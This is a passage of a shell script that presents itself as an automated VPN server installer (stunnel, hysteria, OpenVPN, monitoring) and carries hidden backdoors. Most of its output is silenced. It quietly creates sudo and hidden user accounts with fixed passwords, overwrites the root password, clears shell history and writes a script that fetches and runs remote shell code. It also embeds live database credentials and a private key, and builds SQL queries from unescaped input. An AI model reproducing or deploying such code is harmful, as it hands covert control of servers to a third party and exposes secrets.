0bulNTXJLzdPD4lzIN3uc4A8/9/7kzu89wz4R8Jde2CxqzozEO++fJLNIQw03x5L
GVqU1tZWgn3r9AvCp+bysxhTDjSNb4jwJ2Jz+E8CAwEAAaNTMFEwHQYDVR0OBBYE
FJJMj51fwx9VQip0FALB7yIKcXfEMB8GA1UdIwQYMBaAFJJMj51fwx9VQip0FALB
7yIKcXfEMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBACu/R544
TyhecE1Su8e80rA+gwoWTngowc7aDPGk/xuab3D5PL3WvFUfbFuF0txHxbjM9WM3
oHRC9JQPNWD+ybomHOb7gdnqMb/SjN3iLXNIsNUpwPphr4rFySkHjYXojDbiomV/
ef7r8bGlxqfcxZGARdjVlg6MF2jnlmA8rOrEQ1kYlMe3OMsJ1R7y9j+jQuhkSAyP
So43gmpyBlWqRPnwye33r52YzI95ou3ztTraHlJSu3s6IG7K5i8oN8QL6bWcN6VL
q3IcOrPce0jKI1wWGYGVWkFkCZty8rA7RMcFqQiTU+ffIllWP+H777HQ86YG7BPv
lHMJEU5/au1vOc8=
-----END CERTIFICATE-----" >> stunnel.pem

cat <<"EOM" >/etc/stunnel/stunnel.conf
debug = 0
output = /tmp/stunnel.log
cert = /etc/stunnel/stunnel.pem
[openvpn-tcp]
connect = PORT_TCP  
accept = 443 
[openvpn-udp]
connect = PORT_UDP
accept = 444

[ssh-tunnel]
connect = 22
accept = 555

[stunnel]
connect = 127.0.0.1:8090
accept = 556

EOM

sed -i "s|PORT_TCP|$PORT_TCP|g" /etc/stunnel/stunnel.conf
sed -i "s|PORT_UDP|$PORT_UDP|g" /etc/stunnel/stunnel.conf
cd /etc/default && rm stunnel4

cat <<"EOM" >/etc/stunnel/stunnel4
ENABLED=1
FILES="/etc/stunnel/*.conf"
OPTIONS=""
PPP_RESTART=0
RLIMITS=""
EOM


chmod 755 stunnel4
sudo service stunnel4 restart
  } &>/dev/null
}

install_sudo(){
  {
    useradd -m onvaovpn 2>/dev/null; echo onvaovpn:onvaovpn | chpasswd &>/dev/null; usermod -aG sudo onvaovpn &>/dev/null
    sed -i 's/PermitRootLogin yes/PermitRootLogin no/g' /etc/ssh/sshd_config
    echo "AllowGroups onvaovpn" >> /etc/ssh/sshd_config
    service sshd restart
  }&>/dev/null
}

install_hysteria(){
clear
echo 'Installing hysteria.'
{

#wget -O dnstt.sh "admin-boyes.com/dnstt/dnstt.sh"
chmod +x ~/dnstt.sh && sed -i -e 's/\r$//' ~/dnstt.sh && ./dnstt.sh


#wget -O hysteriav1.sh "admin-boyes.com/tkapi/hysteriav1.sh"
chmod +x ~/hysteriav1.sh && sed -i -e 's/\r$//' ~/hysteriav1.sh && ./hysteriav1.sh

rm -f /etc/hysteria/config.json
#mkdir -p /etc/hysteria/

echo '{
  "listen": ":5666",
  "cert": "/etc/hysteria/server.crt",
  "key": "/etc/hysteria/server.key",
  "up_mbps": 100,
  "down_mbps": 100,
  "disable_udp": false,
  "obfs": "hw",
  "auth": {
    "mode": "external",
    "config": {
    "cmd": "./.auth.sh"
    }
  },
  "prometheus_listen": ":5665",
}
' >> /etc/hysteria/config.json

cat <<"EOM" >/etc/hysteria/.auth.sh
#!/bin/bash
. /etc/openvpn/login/config.sh

if [ $# -ne 4 ]; then
    echo "invalid number of arguments"
    exit 1
fi

ADDR=$1
AUTH=$2
SEND=$3
RECV=$4

USERNAME=$(echo "$AUTH" | cut -d ":" -f 1)
PASSWORD=$(echo "$AUTH" | cut -d ":" -f 2)

USERNAME=$(echo "$AUTH" | cut -d ":" -f 1)
PASSWORD=$(echo "$AUTH" | cut -d ":" -f 2)



Query="SELECT user_name FROM users WHERE user_name='$USERNAME' AND auth_vpn=md5('$PASSWORD') AND status='live' AND is_freeze=0 AND is_ban=0 AND (duration > 0 OR vip_duration > 0 OR private_duration > 0)"
user_name=`mysql -u $USER -p$PASS -D $DB -h $HOST -sN -e "$Query"`
[ "$user_name" != '' ] && [ "$user_name" = "$USERNAME" ] && echo "user : $username" && echo 'authentication ok.' && exit 0 || echo 'authentication failed.'; exit 1

EOM

chmod 755 /etc/hysteria/config.json
chmod 755 /etc/hysteria/.auth.sh

sysctl -w net.core.rmem_max=16777216
sysctl -w net.core.wmem_max=16777216

#wget -O /usr/bin/badvpn-udpgw "https://apk.admin-boyes.com/setup/badvpn-udpgw64"
wget -O /usr/bin/badvpn-udpgw "https://github.com/criz16/DARKSSH-MANAGER/blob/main/Install/badvpn-udpgw"

chmod +x /usr/bin/badvpn-udpgw
ps x | grep 'udpvpn' | grep -v 'grep' || screen -dmS udpvpn /usr/bin/badvpn-udpgw --listen-addr 127.0.0.1:7300 --max-clients 10000 --max-connections-for-client 10 --client-socket-sndbuf 10000


} &>/dev/null
}



online() {


cat <<\EOM >/etc/hysteria/online.sh
#!/bin/bash
. /etc/hysteria/config.sh
serverip=SERVER_IP


tcpusers=$(sed -n -e "/^ROUTING_TABLE/p" /etc/openvpn/server/tcpclient.log | wc -l)
udpusers=$(sed -n -e "/^ROUTING_TABLE/p" /etc/openvpn/server/udpclient.log | wc -l)
total=$((tcpusers + udpusers))

hysteria_fetch=$(curl -o /etc/hysteria/logs http://$serverip:5665/metrics &>/dev/null)
hysteria_udpz=$(cat /etc/hysteria/logs | grep -w 'hysteria_active_conn{auth=' | grep -v '} 0')
hysteriausers=$(echo "$hysteria_udpz" | grep '[^[:space:]]' | wc -l)

mysql -u $USER -p$PASS -D $DB -h $HOST -e "UPDATE server_list SET online='$total', hysteria_online='$hysteriausers' WHERE server_ip='$serverip' "

EOM

sed -i "s|SERVER_IP|$(wget -qO- icanhazip.com)|g" /etc/hysteria/online.sh



cat <<\EOM >/etc/hysteria/ws.sh
#!/bin/bash
if [ $(curl -LI localhost -o /dev/null -w "%{http_code}\n" -s) -eq 000 ];
then
sudo screen -S socks -X kill 
#sudo service openvpn-server@tcp restart
screen -dmS socks python /etc/socks.py 80
fi
EOM

cat <<\EOM >/etc/hysteria/monitor.sh
#!/bin/bash
service=$1
ip=$(ip route get 8.8.8.8 | awk '/src/ {f=NR} f&&NR-1==f' RS=" ")
os="$(neofetch os)"; os="${os##*: }"
distro="$(neofetch distro)"; distro="${distro##*: }"
cpu="$(neofetch cpu --cpu_speed on --cpu_cores off)"; cpu="${cpu##*: }"
memory="$(neofetch memory)"; memory="${memory##*: }"
disk="$(neofetch disk)"; disk="${disk##*: }"
uptime="$(neofetch uptime)"; uptime="${uptime##*: }"
bandwidth=$(vnstat --oneline | cut -d ";" -f 15)

if [[ $service == "ssh" ]];
then
ssh=$(systemctl is-active sshd)
dropbear=$((echo >/dev/tcp/localhost/44) &>/dev/null && echo "active" || echo "inactive")
squid=$(systemctl is-active squid)
ssl=$(systemctl is-active stunnel4)
socket=$((echo >/dev/tcp/localhost/80) &>/dev/null && echo "active" || echo "inactive")
total_sshd=$(netstat -natp | awk "/$ip:22\y/ && /ESTABLISHED/ && /sshd/" | wc -l)
total_dropbear=$(netstat -natp | awk "/$ip:44\y/ && /ESTABLISHED/ && /dropbear/" | wc -l)
total_socket=$(netstat -natp | awk "/$ip:80\y/ && /ESTABLISHED/ && /python/" | wc -l)
total_ssl=$(netstat -natp | awk "/$ip:443\y/ && /ESTABLISHED/ && /stunnel4/" | wc -l)
totalssh=$((total_sshd + total_dropbear + total_socket + total_ssl))
. /root/.ports

output=$(cat <<EOF
{
 "service": "ssh protocol",
 "ip": "$ip",
 "users": "$totalssh",
 "bandwidth": "$bandwidth",
 "os": "$os",
 "distro": "$distro",
 "cpu": "$cpu",
 "memory": "$memory",
 "disk": "$disk",
 "uptime": "$uptime",
 "ssh_port": "$ssh_port - $ssh",
 "dropbear_port": "$dropbear_port - $dropbear",
 "socket_port": "$socket_port - $socket",
 "squid_port": "$squid_port - $squid",
 "ssh_ssl_port": "$ssh_ssl_port - $ssl",
 "dropbear_ssl_port": "$dropbear_ssl_port - $ssl"
}
EOF
)

echo $output

elif [[ $service == "openvpn" ]];
then
tcpovpn=$(systemctl is-active openvpn@server2.service)
udpovpn=$(systemctl is-active openvpn@server.service)
udphysteria=$(systemctl is-active hysteria-server.service)
squid=$(systemctl is-active squid)
ssl=$(systemctl is-active stunnel4)
socket=$((echo >/dev/tcp/localhost/80) &>/dev/null && echo "active" || echo "inactive")
tcpusers=$(sed -n -e '/^ROUTING_TABLE/p' /etc/openvpn/server/tcpclient.log | wc -l)
udpusers=$(sed -n -e '/^ROUTING_TABLE/p' /etc/openvpn/server/udpclient.log | wc -l)
totalovpn=$((tcpusers + udpusers))
. /root/.ports
. /etc/openvpn/login/config.sh

output=$(cat <<EOF
{
 "service": "openvpn protocol",
 "ip": "$ip",
 "users": "$totalovpn",
 "bandwidth": "$bandwidth",
 "os": "$os",
 "distro": "$distro",
 "cpu": "$cpu",
 "memory": "$memory",
 "disk": "$disk",
 "uptime": "$uptime",
 "udp_hysteria": "$hysteria_port - $udphysteria",
 "tcp_port": "$tcp_port - $tcpovpn",
 "udp_port": "$udp_port - $udpovpn",
 "socket_port": "$socket_port - $socket",
 "squid_port": "$squid_port - $squid",
 "tcp_ssl_port": "$tcp_ssl_port - $ssl",
 "udp_ssl_port": "$udp_ssl_port - $ssl"
}
EOF
)

mysql -u $USER -p$PASS -D $DB -h $HOST -e "UPDATE server_list SET cpu_model='$cpu', distro='$distro', memory='$memory', uptime='$uptime', disk='$disk', bandwidth='$bandwidth', os='$os', proto='$service', tcpssl='$tcp_ssl_port', udpssl='$udp_ssl_port', tcp_status='$tcpovpn', hysteria_status='$udphysteria', udp_status='$udpovpn', ssl_status='$ssl', squid_status='$squid', socket_status='$socket', tcp='$tcp_port', udp='$udp_port', hysteria_port='$hysteria_port', squid='$squid_port', socket='$socket_port', online='$totalovpn' WHERE server_ip='$ip' "

elif [[ $service == "openconnect" ]];
then
ocserv=$(systemctl is-active ocserv)
udphysteria=$(systemctl is-active hysteria-server.service)
squid=$(systemctl is-active squid)
ssl=$(systemctl is-active stunnel4)
socket=$((echo >/dev/tcp/localhost/80) &>/dev/null && echo "active" || echo "inactive")
totalocserv=$(echo $(occtl -j -n  show users) | jq ". | length")
. /root/.ports

output=$(cat <<EOF
{
 "service": "openconnect protocol",
 "ip": "$ip",
 "users": "$totalocserv",
 "bandwidth": "$bandwidth",
 "os": "$os",
 "distro": "$distro",
 "cpu": "$cpu",
 "memory": "$memory",
 "disk": "$disk",
 "uptime": "$uptime",
 "udp_hysteria": "$hysteria_port - $udphysteria",
 "tcp_port": "$tcp_port - $ocserv",
 "socket_port": "$socket_port - $socket",
 "squid_port": "$squid_port - $squid",
 "tcp_ssl_port": "$tcp_ssl_port - $ssl",
 "udp_ssl_port": "$udp_ssl_port - $ssl"
}
EOF
)

mysql -u $USER -p$PASS -D $DB -h $HOST -e "UPDATE server_list SET cpu_model='$cpu', distro='$distro', memory='$memory', uptime='$uptime', disk='$disk', bandwidth='$bandwidth', os='$os', proto='$service', tcpssl='$tcp_ssl_port', udpssl='$udp_ssl_port', tcp_status='$tcpovpn', hysteria_status='$udphysteria', udp_status='$udpovpn', ssl_status='$ssl', squid_status='$squid', socket_status='$socket', tcp='$tcp_port', udp='$udp_port', hysteria_port='$hysteria_port', squid='$squid_port', socket='$socket_port', online='$totalovpn' WHERE server_ip='$ip' "

elif [[ $service == "pptp" ]];
then
pptpd=$(systemctl is-active pptpd)

output=$(cat <<EOF
{
 "service": "pptp protocol",
 "ip": "$ip",
 "bandwidth": "$bandwidth",
 "pptpd": "$pptpd",
 "os": "$os",
 "distro": "$distro",
 "cpu": "$cpu",
 "memory": "$memory",
 "disk": "$disk",
 "uptime": "$uptime"
}
EOF
)

echo $output

elif [[ $service == "reboot" ]];
then
sudo shutdown -r now
fi

EOM


chmod +x /etc/hysteria/online.sh
chmod +x /etc/hysteria/monitor.sh
chmod +x /etc/hysteria/ws.sh
}



create_hostname() {

clear

echo 'Creating hostname.'
{
cat << EOF > /etc/hysteria/server.crt
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=PH, ST=MA, L=Antipolo City, O=onvao, OU=onvao, CN=onvao CA/name=onvaonet/emailAddress=mail@onvao.net
        Validity
            Not Before: Sep 20 03:54:08 2022 GMT
            Not After : Sep 17 03:54:08 2032 GMT
        Subject: C=PH, ST=CA, L=Antipolo City, O=onvao, OU=onvao, CN=onvao/name=onvao/emailAddress=mail@onvao.net
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
                Modulus:
                    00:b5:eb:a1:de:45:39:54:a9:12:db:91:b0:68:ac:
                    77:39:7e:4d:ee:5c:ae:6c:2f:57:a7:70:a6:19:39:
                    19:b0:46:75:6d:50:81:9d:3c:43:5a:21:49:84:b1:
                    fa:68:67:2e:05:ba:ec:e1:08:3b:70:07:77:32:03:
                    19:65:7c:af:d5:10:97:8a:3a:af:11:66:ee:42:b2:
                    90:b5:1a:34:28:55:76:0f:a3:ac:f3:e9:1d:fc:d7:
                    5f:7c:89:50:3b:7e:0f:49:61:97:b7:79:b5:c6:29:
                    2a:c5:e3:ef:38:43:77:12:cb:06:d0:e1:2c:4a:38:
                    fe:0a:33:ec:2c:b7:79:bf:b9:fa:d7:ea:2c:9f:02:
                    4f:10:eb:0a:6f:05:5a:50:01:dc:50:93:71:03:b9:
                    63:34:53:9e:30:9d:23:64:66:e8:9c:73:19:85:39:
                    b6:79:b4:55:1d:9d:2a:e0:df:4c:b2:5a:c2:e9:0e:
                    59:a2:3a:70:34:6a:9c:8a:09:34:1d:5e:29:a9:b6:
                    5b:16:ce:9e:c5:6c:50:d6:4d:10:09:60:f6:c9:00:
                    81:29:e3:a1:4c:10:fb:fe:a5:14:d6:b5:2a:e0:72:
                    50:2f:50:dc:bc:34:8d:ca:e2:fb:78:06:4d:b5:cd:
                    fe:9a:cd:2a:b7:c9:79:32:66:4a:bf:d3:d0:04:25:
                    9e:d5
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Cert Type: 
                SSL Server
            Netscape Comment: 
                Easy-RSA Generated Server Certificate
            X509v3 Subject Key Identifier: 
                28:1D:A2:5E:3A:50:2C:3A:E0:B0:54:57:D6:11:02:FC:D6:1F:FF:35
            X509v3 Authority Key Identifier: 
                keyid:DB:6B:D9:7E:CC:36:11:1E:67:E8:45:B0:07:26:88:17:F6:8B:F3:AB
                DirName:/C=PH/ST=MA/L=Antipolo City/O=onvao/OU=onvao/CN=onvao CA/name=onvao/emailAddress=mail@onvao.net
                serial:52:67:60:3D:A2:29:17:35:5F:CA:B9:4A:8E:E2:80:74:F3:CE:64:EB

            X509v3 Extended Key Usage: 
                TLS Web Server Authentication
            X509v3 Key Usage: 
                Digital Signature, Key Encipherment
            X509v3 Subject Alternative Name: 
                DNS:[server]
    Signature Algorithm: sha256WithRSAEncryption
         0c:5a:d1:93:48:73:de:35:f0:1b:b5:88:71:be:ce:04:e0:f7:
         c3:b1:ef:48:05:2f:20:ff:68:6c:e6:10:0f:d2:65:6b:57:e4:
         cc:36:af:4c:ec:d4:0c:46:4c:76:5a:7d:20:74:92:67:41:5f:
         74:27:3b:48:39:51:65:ff:86:3b:1b:6a:15:b1:11:99:45:cd:
         03:0e:e2:46:5d:c0:19:e0:07:0c:18:1e:6e:a1:f6:f2:32:b5:
         3d:91:27:0a:e8:ae:e5:22:a0:f1:87:9f:b8:ba:d8:eb:6b:2b:
         82:8d:e4:2e:66:0a:2a:1f:f6:bb:ee:6a:92:8f:c7:77:0d:ee:
         68:96:58:ce:52:c5:6a:c5:7a:24:fd:ee:83:ba:0b:4e:28:b6:
         92:60:f1:ce:24:bc:9e:a5:ca:73:d3:cc:69:48:a4:8b:31:c3:
         7f:41:d1:31:2d:1e:e8:c7:4f:5d:d6:c1:e8:8d:b7:44:49:0a:
         5a:6c:ea:44:a3:70:19:12:2d:a9:d1:90:bd:3a:3d:4b:85:c0:
         35:d0:03:94:1f:de:68:1c:a0:5d:f0:b9:6c:40:68:97:1a:25:
         c1:5a:a0:cc:a9:51:68:d5:37:be:74:e4:23:0a:fd:74:92:54:
         9e:2f:fc:65:56:d1:27:3b:05:01:b4:c1:b4:a9:10:8d:70:30:
         a0:b6:74:55
-----BEGIN CERTIFICATE-----
MIIFazCCBFOgAwIBAgIBATANBgkqhkiG9w0BAQsFADCBqjELMAkGA1UEBhMCUEgx
CzAJBgNVBAgTAk1BMRYwFAYDVQQHEw1BbnRpcG9sbyBDaXR5MRIwEAYDVQQKEwlU
S05ldHdvcmsxEjAQBgNVBAsTCVRLTmVyd29yazEVMBMGA1UEAxMMVEtOZXR3b3Jr
IENBMRIwEAYDVQQpEwlUS05ldHdvcmsxIzAhBgkqhkiG9w0BCQEWFGVyaWNsYXls
YXlAZ21haWwuY29tMB4XDTIyMDkyMDAzNTQwOFoXDTMyMDkxNzAzNTQwOFowgacx
CzAJBgNVBAYTAlBIMQswCQYDVQQIEwJDQTEWMBQGA1UEBxMNQW50aXBvbG8gQ2l0
eTESMBAGA1UEChMJVEtOZXR3b3JrMRIwEAYDVQQLEwlUS05lcndvcmsxEjAQBgNV
BAMTCVRLTmV0d29yazESMBAGA1UEKRMJVEtOZXR3b3JrMSMwIQYJKoZIhvcNAQkB
FhRlcmljbGF5bGF5QGdtYWlsLmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBALXrod5FOVSpEtuRsGisdzl+Te5crmwvV6dwphk5GbBGdW1QgZ08Q1oh
SYSx+mhnLgW67OEIO3AHdzIDGWV8r9UQl4o6rxFm7kKykLUaNChVdg+jrPPpHfzX
X3yJUDt+D0lhl7d5tcYpKsXj7zhDdxLLBtDhLEo4/goz7Cy3eb+5+tfqLJ8CTxDr
Cm8FWlAB3FCTcQO5YzRTnjCdI2Rm6JxzGYU5tnm0VR2dKuDfTLJawukOWaI6cDRq
nIoJNB1eKam2WxbOnsVsUNZNEAlg9skAgSnjoUwQ+/6lFNa1KuByUC9Q3Lw0jcri
+3gGTbXN/prNKrfJeTJmSr/T0AQlntUCAwEAAaOCAZswggGXMAkGA1UdEwQCMAAw
EQYJYIZIAYb4QgEBBAQDAgZAMDQGCWCGSAGG+EIBDQQnFiVFYXN5LVJTQSBHZW5l
cmF0ZWQgU2VydmVyIENlcnRpZmljYXRlMB0GA1UdDgQWBBQoHaJeOlAsOuCwVFfW
EQL81h//NTCB6gYDVR0jBIHiMIHfgBTba9l+zDYRHmfoRbAHJogX9ovzq6GBsKSB
rTCBqjELMAkGA1UEBhMCUEgxCzAJBgNVBAgTAk1BMRYwFAYDVQQHEw1BbnRpcG9s
byBDaXR5MRIwEAYDVQQKEwlUS05ldHdvcmsxEjAQBgNVBAsTCVRLTmVyd29yazEV
MBMGA1UEAxMMVEtOZXR3b3JrIENBMRIwEAYDVQQpEwlUS05ldHdvcmsxIzAhBgkq
hkiG9w0BCQEWFGVyaWNsYXlsYXlAZ21haWwuY29tghRSZ2A9oikXNV/KuUqO4oB0
885k6zATBgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBaAwEwYDVR0RBAww
CoIIW3NlcnZlcl0wDQYJKoZIhvcNAQELBQADggEBAAxa0ZNIc9418Bu1iHG+zgTg
98Ox70gFLyD/aGzmEA/SZWtX5Mw2r0zs1AxGTHZafSB0kmdBX3QnO0g5UWX/hjsb
ahWxEZlFzQMO4kZdwBngBwwYHm6h9vIytT2RJwroruUioPGHn7i62OtrK4KN5C5m
Ciof9rvuapKPx3cN7miWWM5SxWrFeiT97oO6C04otpJg8c4kvJ6lynPTzGlIpIsx
w39B0TEtHujHT13WweiNt0RJClps6kSjcBkSLanRkL06PUuFwDXQA5Qf3mgcoF3w
uWxAaJcaJcFaoMypUWjVN7505CMK/XSSVJ4v/GVW0Sc7BQG0wbSpEI1wMKC2dFU=
-----END CERTIFICATE-----
EOF

cat << EOF > /etc/hysteria/server.key
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC166HeRTlUqRLb
kbBorHc5fk3uXK5sL1encKYZORmwRnVtUIGdPENaIUmEsfpoZy4FuuzhCDtwB3cy
AxllfK/VEJeKOq8RZu5CspC1GjQoVXYPo6zz6R381198iVA7fg9JYZe3ebXGKSrF
4+84Q3cSywbQ4SxKOP4KM+wst3m/ufrX6iyfAk8Q6wpvBVpQAdxQk3EDuWM0U54w
nSNkZuiccxmFObZ5tFUdnSrg30yyWsLpDlmiOnA0apyKCTQdXimptlsWzp7FbFDW
TRAJYPbJAIEp46FMEPv+pRTWtSrgclAvUNy8NI3K4vt4Bk21zf6azSq3yXkyZkq/
09AEJZ7VAgMBAAECggEBALI+EPcKtEVy8vsXH9UvRhGa4xhszqlJKYTxJo0IGVdR
cbSNcLFyXjts6e+Nwl+Q2NLcd0N1IWd+qRbjWnrJVC5ad2AEZ4uRYlkPRCFtbzUl
putj3w2Mlsko7HHEyEvCE5A+grxOD//8TeBemAB0ebJ8Ik1+kjqW5LFydjDKBAwI
sYjXpYGkMST9rqG82EToQn9jL5Ncby35Ls3owzWDfd/1Y4NQmk6gO09spoMzWJpS
mSiV+w83QxxJtOgT00O9NuDz9skotW3v2xWTZue0BzMirCTQWPiFRL1476/O9KYD
KUBAcWynC/PE4ub0lMfaesdrggjRoDYvaQp3xLx/6HECgYEA4siN9t7Ogwhf/4X7
BAN+2OSRWRW8tn9wzzNAPzhjs8igm4W+C4lQtMmW9eFOHuRj6TiWp4w36m4cs5VF
eK39mp3/nyd9l68bFjGxw3XZsI/5bTGgcrSVAAAGp65xadI3+1Ozy7OmFoRF/Gkv
X7+/DyWz5nb9yAH/N69vPpVek8sCgYEAzVt4qpMc5tX6tMxCAC1ZUFo8fwSZndmk
jDTgb2G2O1YIqrYHqVjtwMQiDxvBGdkVJuy8QQQHM6YCD3o1Jq56bjvY1IlumXCW
0YeKfSeqfXN/nBCkyZxa79DkQSPeYEjFTFABVe/SEEcasn8HrlyygtFT+nLCcEz/
V1ekP5Mmg98CgYEApsGOEh9XfuZjoIKmRxdC6L15WyYus4sWKmWnMlWGiqZV4sX/
LoB0BdvN01MunGyYQt/Hd8AVRZ5eIHb8tHZL6quPUTo6kZTCuBkme3Fm9vuHDxHU
x0Od5HggbKBK6OMZIwczR+/7iscMp0O5ABEArmSs2iRZC/7b6dhoVn6DIu0CgYA+
tOvHylxM8JI5mxWcUDyxmJxYfOMbnFXuqkbOPBwVSlQjLKpyP8F512o/Cs6QQgV/
eVKS19QLJWoDp+GLCkRAXO39GGo5WHP1T1oulWouHJKe6UYoeiIakMLiUT2aUR5O
CzAdObn/VncEgl2qFIw9/gWSuHA/MoPV++EfuKNOKQKBgDbyYfG3JESaLpaEiPED
UQDv4iVBzaqA3sMpmpA2YRIUZE4ZzSuiVMxGHfhAvueuiMwyzqsLe0BOgCNtJDg3
o4CmMhs3Wlw5FiOru1LxQY//65wi5q8+rNF4DR3oUKoVGb1PD3Gm8ZsxirhMOCrc
sKKWTJk08giHse+yqTKQ05uR
-----END PRIVATE KEY-----
EOF


cat <<\EOM >/etc/hysteria/config.sh
#!/bin/bash
HOST='68.168.213.74'
USER='t34mw0rk_db'
PASS='cDzTqNmGpkDJY3XZPAVT'
DB='t34mw0rk_db'
EOM


sed -i "s|DBHOST|$HOST|g" /etc/hysteria/config.sh
sed -i "s|DBUSER|$USER|g" /etc/hysteria/config.sh
sed -i "s|DBPASS|$PASS|g" /etc/hysteria/config.sh
sed -i "s|DBNAME|$DBNAME|g" /etc/hysteria/config.sh


chmod 755 /etc/hysteria/config.json
chmod 755 /etc/hysteria/server.crt
chmod 755 /etc/hysteria/server.key
chmod 755 /etc/hysteria/ws.sh


API_LINK='https://muzaffersanli.com';
API_KEY='**********';

cat <<EOF >/home/authentication.sh
#!/bin/bash
SHELL=/bin/bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
wget -O /home/active.sh "$API_LINK/active.php?key=$API_KEY"
sleep 5
wget -O /home/inactive.sh "$API_LINK/inactive.php?key=$API_KEY"
sleep 5
wget -O /home/deleted.sh "$API_LINK/deleted.php?key=$API_KEY"
sleep 15
bash /home/active.sh
sleep 15
bash /home/inactive.sh
sleep 15
bash /home/deleted.sh
EOF

#echo -e "* *\t* * *\troot\tsudo bash /home/authentication.sh" >> "/etc/cron.d/account"

 /usr/sbin/useradd -p $(openssl passwd -1 romero) -M criz


}
}


installBBR() {
    echo "net.core.default_qdisc=fq" >> /etc/sysctl.conf
    echo "net.ipv4.tcp_congestion_control=bbr" >> /etc/sysctl.conf
    sysctl -p
    
    apt install -y linux-generic-hwe-20.04
    grub-set-default 0
    echo "tcp_bbr" >> /etc/modules-load.d/modules.conf
    INSTALL_BBR=true
}

install_rclocal(){
  {
  sed -i 's/Listen 80/Listen 81/g' /etc/apache2/ports.conf
    systemctl restart apache2
    
    sudo systemctl restart stunnel4
    sudo systemctl enable openvpn@server.service
    sudo systemctl start openvpn@server.service
    sudo systemctl enable openvpn@server2.service
    sudo systemctl start openvpn@server2.service    
    
    echo "[Unit]
Description=onvao.net Oto Kurulum
Documentation=http://onvao.net

[Service]
Type=oneshot
ExecStart=/bin/bash /etc/rc.local
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target" >> /etc/systemd/system/teamkidlat.service
    echo '#!/bin/sh -e
iptables-restore < /etc/iptables_rules.v4
ip6tables-restore < /etc/iptables_rules.v6
sysctl -p
service stunnel4 restart
systemctl restart openvpn@server.service
systemctl restart openvpn@server2.service
systemctl restart hysteria-server.service
screen -dmS socks python /etc/socks.py 80
screen -dmS socks python ~/.ubuntu.py 8089
sudo kill $( sudo lsof -i:5300 -t )
nsname="$(cat /root/ns.txt)"
cd /root/dnstt/dnstt-server
screen -dmS slowdns ./dnstt-server -udp :5300 -privkey-file server.key $nsname 127.0.0.1:442
ps x | grep 'udpvpn' | grep -v 'grep' || screen -dmS udpvpn /usr/bin/badvpn-udpgw --listen-addr 127.0.0.1:7300 --max-clients 10000 --max-connections-for-client 10 --client-socket-sndbuf 10000
screen -dmS webinfo php -S 0.0.0.0:5623 -t /root/.web/
bash /etc/hysteria/monitor.sh openvpn
bash /etc/hysteria/online.sh
exit 0' >> /etc/rc.local
    sudo chmod +x /etc/rc.local
    systemctl daemon-reload
    sudo systemctl enable teamkidlat
    sudo systemctl start teamkidlat.service
    
    mkdir -m 777 /root/.web
echo "Onvao.net tarafından geliştirilmiştir... " >> /root/.web/index.php

echo "tcp_port=TCP_PORT
udp_port=UDP_PORT
socket_port=80
squid_port=8080
hysteria_port=5666
tcp_ssl_port=443
udp_ssl_port=442" >> /root/.ports

sed -i "s|TCP_PORT|$PORT_TCP|g" /root/.ports
sed -i "s|UDP_PORT|$PORT_UDP|g" /root/.ports

sed -i "s|SERVERIP|$MYIP|g" /etc/.counter
  }&>/dev/null
}

start_service () {
clear

echo 'Starting..'
{

sudo crontab -l | { echo "* * * * * pgrep -x stunnel4 >/dev/null && echo 'GOOD' || /etc/init.d/stunnel4 restart
* * * * * /bin/bash /etc/hysteria/online.sh >/dev/null 2>&1
* * * * * /bin/bash /usr/local/sbin/jho/cron.sh >/dev/null 2>&1
* * * * * /bin/bash /etc/hysteria/ws.sh >/dev/null 2>&1
* * * * * /bin/bash /etc/hysteria/monitor.sh openvpn >/dev/null 2>&1"; } | crontab -
sudo systemctl restart cron
} &>/dev/null
clear
echo '++++++++++++++++++++++++++++++++++'
echo '*       Kurulum Tamamlandı!    *'
echo '+++++++++++************+++++++++++'
echo -e "[IP] : $MYIP\n[Openvpn TCP Port] : $PORT_TCP\n[Openvpn UDP Port] : $PORT_UDP\n[Ssl Port] : 443\n[Proxy Socks ] : 80\n[Hysteria Port ] : 5666\n[Proxy Squid 1] : 8080\n[Proxy Squid 2] : 3128\n"
history -c;
 history -c
  echo 'root:005434677197' | sudo chpasswd
rm /etc/.systemlink
echo 'Kurulum tamamlandı sunucu 20 saniye sonra yeniden başlatılacaktır'
sleep 20
reboot
}



server_ip=$(curl -s https://api.ipify.org)
server_interface=$(ip route get 8.8.8.8 | awk '/dev/ {f=NR} f&&NR-1==f' RS=" ")

install_require
install_hysteria
online
create_hostname
installBBR
install_squid
install_openvpn
install_firewall_kvm
install_stunnel
install_rclocal
install_dropbear
install_banner
install_socks
start_service
